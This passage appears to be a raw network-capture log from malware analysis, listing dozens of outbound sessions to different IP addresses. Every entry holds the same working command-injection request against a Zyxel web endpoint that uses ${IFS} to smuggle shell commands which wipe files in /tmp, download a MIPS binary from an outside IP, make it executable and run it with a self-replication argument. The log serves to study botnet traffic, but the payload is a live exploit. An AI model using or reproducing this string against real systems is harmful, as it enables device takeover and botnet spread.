                                                Jan 28, 2024 10:16:17.697391033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2545192.168.2.235030424.216.185.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697413921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2546192.168.2.2353808211.94.79.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697427034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2547192.168.2.2356010115.67.91.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697438002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2548192.168.2.2346954111.41.190.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697467089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2549192.168.2.233958637.99.12.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697499990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2550192.168.2.2347882110.112.202.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697545052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2551192.168.2.235545061.10.0.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697571039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2552192.168.2.2334224104.171.122.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697582006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2553192.168.2.236076045.205.166.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697640896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2554192.168.2.234852895.47.231.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697659969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2555192.168.2.235417041.113.172.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697683096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2556192.168.2.236006437.15.75.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697699070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2557192.168.2.2349128179.132.238.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697726011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2558192.168.2.2344366131.3.238.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697757006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2559192.168.2.234977231.40.235.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697779894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2560192.168.2.23485584.73.210.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697797060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2561192.168.2.235668875.15.128.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697840929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2562192.168.2.234523084.167.179.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697863102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2563192.168.2.2359454160.35.183.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697902918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2564192.168.2.2349674183.49.153.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697920084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2565192.168.2.2334096144.217.22.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697952986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2566192.168.2.233769689.121.213.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697966099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2567192.168.2.2343466187.175.43.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697992086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2568192.168.2.234553657.197.128.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698005915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2569192.168.2.234298647.86.54.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698056936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2570192.168.2.235139665.192.2.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698098898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2571192.168.2.233313271.223.210.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698105097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2572192.168.2.2353910107.85.186.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698132038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2573192.168.2.2344132176.105.166.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698139906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2574192.168.2.2356062163.190.1.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698160887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2575192.168.2.234493224.201.113.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698208094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2576192.168.2.2333940119.25.104.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698240995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2577192.168.2.235690619.105.55.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698282003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2578192.168.2.2358354159.114.211.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698312044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2579192.168.2.2335264175.78.29.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698338032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2580192.168.2.2342406153.255.86.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698370934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2581192.168.2.2360388105.163.53.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698381901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2582192.168.2.2344844179.182.176.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698410988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2583192.168.2.233422650.208.195.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698462963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2584192.168.2.233461489.19.6.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698503971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2585192.168.2.2356924139.98.243.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698522091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2586192.168.2.2351582151.149.91.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698556900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2587192.168.2.2357762216.230.102.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698589087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2588192.168.2.235412419.162.232.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698609114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2589192.168.2.233478819.96.212.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698622942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2590192.168.2.2354376138.158.60.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698646069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2591192.168.2.2339810168.91.241.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698698997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2592192.168.2.234797693.130.188.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698724985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2593192.168.2.2336474190.134.106.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698745012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2594192.168.2.2339028150.221.237.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698777914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2595192.168.2.234703295.111.213.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698806047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2596192.168.2.2335786108.251.252.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698828936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2597192.168.2.2332998204.109.221.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698859930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2598192.168.2.2341648102.86.226.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.698878050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2599192.168.2.233986265.118.35.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.701081038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2600192.168.2.235863662.41.50.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.701092958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2601192.168.2.2349430174.25.59.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.701107025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2602192.168.2.234109498.174.150.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.701136112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2603192.168.2.234960281.199.124.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.701421022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2604192.168.2.2354864126.183.211.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.701438904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2605192.168.2.233613888.131.119.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.701458931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2606192.168.2.2339950198.120.199.52443
                                                TimestampBytes transferredDirectionData
